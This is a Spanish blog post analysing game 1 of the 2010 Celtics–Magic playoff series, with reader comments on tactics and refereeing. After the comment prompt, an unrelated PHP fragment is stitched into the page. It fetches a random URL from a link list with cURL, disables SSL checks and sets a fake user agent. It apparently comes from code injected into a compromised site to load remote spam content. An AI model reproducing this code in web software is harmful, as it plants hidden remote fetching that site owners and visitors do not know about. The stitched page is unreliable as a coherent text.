Playoffs 16/05/2010: La primera, en la frente

17 de May de 2010 por TheDeerHunter

celtshoward

Los Orlando Magic han perdido su imbatibilidad. Muy preocupante si nos atenemos a los precedentes: un 1-10 en las series donde perdieron el primer partido. Estos Celtics nunca han sido eliminados cuando se lo llevaron.

Del cielo de los “ciento y pico” puntos anotados, “ochenta y pocos” recibidos, altísimos porcentajes desde cualquier lado, todas las líneas funcionando… se pasó al infierno en pocos minutos. En seguida se vio que no iba a ser la noche de Dwight Howard. Ya sabíamos que Rivers lo tiene bien estudiado. Todo el rato forzándole a lanzar con la izquierda, llevándole a la línea antes de concederle tiros fáciles, alta presión al balón, ayudas asfixiantes cuando lo llevaban al costado… Howard se agobió muy pronto. Sus tres primeros cuartos fueron como para echarse a llorar, completamente descentrado, cayendo continuamente en las provocaciones de Wallace y compañía. Muchas pérdidas de balón, demasiadas canastas y tiros libres fallados. Apenas logró anotar en jugada y el clásico dentro-fuera al que tanto rendimiento han sacado no llegó a funcionar en ningún momento. Rashard Lewis tuvo mucho que ver en ello. Estuvo bloqueado, fallando todos los tiros abiertos que le llegaron. Después simplemente hizo mutis. Imperdonable para alguien de su jerarquía.

El problema es que el juego interior de Orlando no sólo hizo aguas ofensivamente. Los Celtics entraron a canasta “como Pedro por su casa”. Es cierto que Howard y Lewis pusieron 7 tapones entre ambos, pero fueron situaciones puntuales, concentradas más en el último arreón, cuando la cosa estaba más complicada. Los Celtics lograron sacar de su posición a “Supermán” con buenos tiros abiertos, sobre todo, de Rasheed y Davis. El resto fue más fácil.

Llamó la atención la asignación de los marcajes exteriores por parte de Van Gundy. A priori uno podría pensar que Barnes, por físico y envergadura, es un defensor ideal para coger a

riverskg

Pierce. De ello se encargo Carter… y Pierce, rejuveneció con este emparejamiento. Peor lo pasó Barnes, que ni olió a un Allen mucho más rápido que él. Sólo en el momento en el que Van Gundy tiró de la atípica pareja Redick-Carter la defensa llegó a funcionar sólidamente.

Y lo bonito de todo esto es que, a pesar de que el “enjambre defensivo” que dispuso Rivers asfixió a Orlando en los tres primeros cuartos y que los Celtics llegaron a disponer de 20 puntos de ventaja, al final Van Gundy dio con la fórmula y estuvieron a punto de lograr la

machada, de la mano de Vinsanity y de la irrupción de Redick, además del apagón de luces que sufrieron los Celtics en general y Rondo en particular en el último cuarto. Quizás pueda sacar provecho de esa fórmula en los próximos días. Veremos variantes de todo esto. No hay duda.

PREMIOS

MVP: Sensacional actuación de la pareja Allen-Pierce con 47 puntos, 17 rebotes y 8 asistencias entre ambos, un auténtico quebradero de cabeza para los Magic.

La sorpresa: En partidos como el de anoche queda escaso margen para la sorpresa, y lo más parecido fue el despliegue físico de Rasheed Wallace, capaz de contener a Dwight Howard (aunque fuese a hachazos) además de aportar en ataque con 13 puntos.vcdunk

La decepción: Ya lo hemos dicho más arriba, Rashard Lewis desapareció por completo cuando más le necesitaba su equipo y se limitó a hace un triste 2 de 10 en tiros de campo, con 0 de 6 en triples, en más de 42 minutos.

El mayor esfuerzo en vano: Por momentos parecía que sólo Vince Carter era consciente de lo que había en juego. Estuvo agresivo de cara al aro, logró 23 puntos y nos dejó un par de mates que nos recordaron lo que este hombre era capaz de hacer en el aire.

Y MAÑANA:

A las 3 de la próxima madrugada arrancan las finales de la Conferencia Oeste, con la visita de los Phoenix Suns al Staples Center de Los Angeles. Aquí estaremos para contaros los detalles de lo que suceda entre Suns y Lakers.

Comenta

15 comentarios a esta entrada

  1. Love Denise dice:
    #1

    ahhh, muy mal partido el de anoche de los Magic; los Celtics han defendido bien, al límite del reglamento en varias ocasiones, pero pienso que haciendo poco se han llevado la victoria por el hecho de que el ataque de Orlando ha estado increiblemente mal, sobre todo en el triple, tan solo 5 triples anotados para un equipo que facilmente supera la decena, en especial Lewis, no es normal verle fallar esos tiros. Howard tampoco ha tenido un buen día, y las buenas actuaciones de Nelson & Carter no ha podido compensar el decepcionante partido de Dwight & Lewis.
    Bueno, la eliminatoria es larga, y aún habiendo hecho un partido horrible, hemos tenido algunas opciones al final, si el partido hubiera durado 3 minutos más….
    Sobre los Celtics, personalmente, veo bastante mal a Garnett, muy lejos de su nivel. Me gsuta bastante Glen Davis, yo creo que debería jugar más.

      Citar

  2. sergio dice:
    #2

    Es decir Love Denise… , que “punto” para Doc Rivers no???

      Citar

  3. TheDeerHunter dice:
    #3

    Tú que sigues más habitualmente a Orlando, LDenise… ¿porqué crees SVG se decidió por cambiar los emparejamientos naturales en la defensa a los aleros? Peor no pudo resultar el invento.

    De Orlando me decepcionó muchísimo la dirección y la circulación de balón. Lo único que me gustó de ellos fue Vince Carter… y Redick. Nelson tuvo algún momento bueno, pero en general lo vi muy perdido en la construcción del juego.

    Y vaya telita con Rashard Lewis…

    PD: Vi un arbitraje muy poco casero para ser de playoffs, pero creo que lo del límite de la legalidad también puede aplicarse a varios jugadores de Orlando.

      Citar

  4. Love Denise dice:
    #4

    no sé porque V. Gundy eligió estos emparejamientos, supongo que lo cambiará para el 2º partido.
    Doc Rivers es muy bueno, pero tampoco ahora hay que alabarlo y besarle los pies por este partido, pienso que ha sido más demerito Magic, que merito de los Celtics, que con practicamente 3 jugadores se cargó a Orlando.
    Redick ha mejorado muchísimo este año con respecto a los anteriores, tanto en ataque como en defensa.
    Lo que no entiendo y nunca entenderé es la jerarquía de los coj,…en la NBA. comprendo que Lewis es fundamental en este equipo, pero si se ve desde una milla que no tiene el día bueno…por qué no sacas un rato a Anderson e incluso a Bass???
    Cuando juegas contra los Celtics tienes que tener asumido que cualquier jugada dudosa va a ir favorable a ellos, aunque, obviamente, no culpo a los arbitros de la victoria verde.

      Citar

  5. MagicJohnson32 dice:
    #5

    Personalmente, voy a necesitar otro partido de esta serie para sacar lecturas claras. Por un lado, me pareció ejemplar la defensa de los Celtics durante casi todo el partido, tanto en la labor sobre Dwight como en el perímetro ante la amenaza de los triples. Por otro, creo que los Magic acusaron tanto tiempo sin jugar, especialmente tanto tiempo sin jugar un partido de verdad, y no lo que se encontraron en las dos primeras rondas. Los Celtics venían lanzados tras la serie contra los Cavs, y en la primera parte fue evidente la diferencia de intensidad entre unos y otros.

    Pinta serie larga, salvo, claro está, que los Celtics roben el segundo también.

      Citar

  6. TheDeerHunter dice:
    #6

    Cito a LDenise: “pienso que ha sido más demerito Magic, que merito de los Celtics, que con practicamente 3 jugadores se cargó a Orlando”

    De lo que has dicho no comprendo esta frase. No entiendo cómo has llegado a esa conclusión, cuando todos los jugadores que jugaron ayer por los Céltics arrimaron el hombro. Hablas de 3… supongo que te refieres a Pierce, Allen y Wallace. Yo lo subiría a 5 innegociablemente, con muy buena aportación de Toni Allen (que no tuvo que jugar mucho porque Allen y Pierce estuvieron sublimes) y también de Glen Davis.
    Rondo, Perkins y Garnett estuvieron más flojos, cierto… en ataque, porque en defensa estuvieron sólidos.
    Yo estaría más preocupado por el resultado en el peor partido de Rondo de esta postemporada.

    Yo no creo que en el demérito de Magic. Me parece causa-efecto que a las grandes defensas les acompañen errores no provocados. La cabeza y la muñeca no funciona igual cuando disfrutas continuamente de tiros abiertos que cuando tienes que sudar sangre para encontrar alguno.

    Y a pesar de la gran reacción del último cuarto veo a los Celtics muy perros en el sentido de administrar sus ventajas. Me recuerdan a los Spurs o los Jazz de sus mejores épocas. Cada punto que te sacan es un parto para recuperarlo.

      Citar

  7. Love Denise dice:
    #7

    joer deer hunter, no seas tan inflexible, es una forma de hablar, ningún equipo gana a otro con 3 tíos.

      Citar

  8. mmmm dice:
    #8

    Que el arbitraje fue “poco casero”? Madre mía, lo que hay que oír… Recuerdo unas cuantas a favor de Orlando, unos pies, un campo atrás, una entrada ilegal de Gortat tras un tiro libre, faltas a Rondo no pitadas etc etc. Para mí fue normalmente casero esta vez.

    ¿Dónde están los que apostaban por el 4-0?Juajuajua!

      Citar

  9. TheDeerHunter dice:
    #9

    Hombre… qué quieres que te diga. A mí me la trufa quien gane y no vi nada de eso.
    Vi algunas decisiones complicadas a favor de los visitantes… en concreto una de ellas en una entrada a por uvas de Allen, donde perdió el balón, pitaron fuera de Orlando y después lo repitieron en el video marcador con el consiguiente broncón del público. Las supuestas faltas a Rondo… supongo que ni la décima parte de las supuestas faltas a Howard, al que defendieron con todo, hachas incluídas. Desde luego que el arbitraje “normal” de playoffs es otra cosa.

    LDenise… me sonaba extraño el comentario. Que parece que querías decir que sólo habían jugado bien 3, lo cual casualmente es el número concreto de los que verdaderamente destacaron por parte de los Celtics, de ahí mi confusión. Pero que en general los verdes cuajaron un partido bastante completo. Ya se pueden dar con un canto en los dientes que todos los partidos los jueguen a este nivel general.

      Citar

  10. kantonyo dice:
    #10

    Pues yo creo que los últimos 5 minutos fueron totalmente caseros, sino fueran por esas ayudas Boston no hubiera sufrido al final.

    Por lo demás creo que Boston fue muy superior que no quiere decir que lo vaya a ser en la eliminatoria. Cuando Allen y Pierce estan bien y cómodos son muy temibles.

    Ayer especialmente me defraudaron Lewis y Howard.

      Citar

  11. mmmm dice:
    #11

    Bueno, tampoco discutiremos por eso. El arbitraje no ha sido decisivo, como casi nunca lo es en NBA. Boston gano porque fueron mejores.
    Aun habiendo ganado el primer partido, veo muy difícil la serie, porque en pocos partidos se sumará el poco acierto en triples con la inoperancia de Howard. Tienen demasiados recursos estos Magic…
    Apuesto a 7 partidos, no sé quien ganara, la verdad.

      Citar

  12. sergio dice:
    #12

    Los Celtics cada vez demuestra mas su poderio a la hora de defender a la principal estrella del equipo rival. Eso, en un equipo como los Magic no deberia ser un gran problema, siempre y cuando el resto de jugadores se destapen un poquito. Creo que el porcentaje de triples puede considerarse como anecdótico. No creo que se repita. Aunque no por eso los de Florida van a poder ganarle a un equipo tan bien compensado como son los Celtics.

    Será una eliminatoria apasionante. Veo fundamental el duelo Rivers-Van Gundy.

      Citar

  13. portu dice:
    #13

    La defensa de los Celtics fue otra vez muy buena, la clave fue la intensidad global y tb la generosidad en las ayudas, pero destacó Perkins sobre Howard y luego Sheed, aunque éste necesitó dar más palos…
    El arbitraje no fue tan casero como suele ser en playoffs, pero yo ví tb las decisiones dudosas ir casi siempre a favor de Orlando… hay un palo como una casa a Rondo en una entrada en la q rompe la cintura R. Lewis q es imposible q no vieran, el campo atrás q se comentaba algo más arriba tb pareció claro, no era un balón totalmente descontrolado, un ataque a Pierce donde le anulan la canasta en el 1er cuarto q era falta del defensor bastante clara… no sé, se mereció quizás Sheed la 2ª técnica y tb debió recibir alguna falta más en ataque Howard cuando encaraba el aro, pero en todo lo demás fueron caserillos sin exagerar.

      Citar

  14. Viva_Dirk dice:
    #14

    A mi no me sorprendió demasiado el partido, los Celtics dominaron como dominaron a los Cavs, a base de una defensa casi perfecta y decisiones sencillas en ataque, aprovechando muy bien cada ventaja que tenian sobre sus pares por minúsculas que fuesen.

      Citar

  15. LEmontus dice:
    #15

    Boston ganó por su defensa en general y por kendrick ´´inténtalo pero no me reiré“ perkins que on ball es el pivot que mejor defiende de la nba, una pena que no sea un destacado taponador. Howard estuvo bien tapado. No veis a Nelson excesivamente rápido? creo que tantos parones le han servido para llegar al 100% a los PO.

    Esta serie dije que costaría pero serapara Magic.(Y eso que todavía estoy esperando a que Vince aparezca…)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>